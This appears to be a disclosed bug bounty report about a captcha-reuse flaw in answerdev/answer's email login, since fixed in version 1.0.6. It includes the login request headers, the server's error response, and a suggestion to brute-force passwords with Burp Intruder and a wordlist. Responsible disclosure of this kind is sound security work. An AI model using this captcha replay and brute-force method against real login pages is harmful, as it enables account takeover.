Captcha Bypass on login in answerdev/answer


Reported on

Feb 21st 2023


So if we login incorrectly multiple times, we get captcha. Each captcha has "captcha_id" and solve "captcha_code" For example: "captcha_code":"8awt" "captcha_id":"7nToXDrT6SkJ2BJxKG1u" You can use same captcha code and captcha id in login without any problem

Captcha is generated with -

Proof of Concept

Login multiple times and get any captcha Captcha URL:

Type captcha code and login

Your request:

POST /answer/api/v1/user/login/email HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 105
Connection: close


Use this request as long as you want, with same captcha_code and same captcha_id

Response you will get each time:
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Date: Tue, 21 Feb 2023 12:44:12 GMT
Content-Length: 186
Connection: close

{"code":400,"reason":"error.object.email_or_password_incorrect","msg":"Email and password do not match.","data":[{"error_field":"e_mail","error_msg":"Email and password do not match."}]}

You can use burpsuite and send it to intruder and add wordlist then check with 1000 requests. Result will be same.


The security measure is to require the user to solve a captcha after multiple failed login attempts. The captcha includes a "captcha_code," which is the code the user must enter to prove they are human, and a "captcha_id," which is a unique identifier for that particular captcha. Once a attacker solves 1 captcha, they can use the same "captcha_code" and "captcha_id" for subsequent login attempts without any issue.

We are processing your report and will contact the answerdev/answer team within 24 hours. 3 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 3 months ago
hatlesswizard modified the report
3 months ago
hatlesswizard modified the report
3 months ago
joyqi validated this vulnerability 2 months ago
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
joyqi marked this as fixed in 1.0.6 with commit 813ad0 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
joyqi published this vulnerability 2 months ago
to join this conversation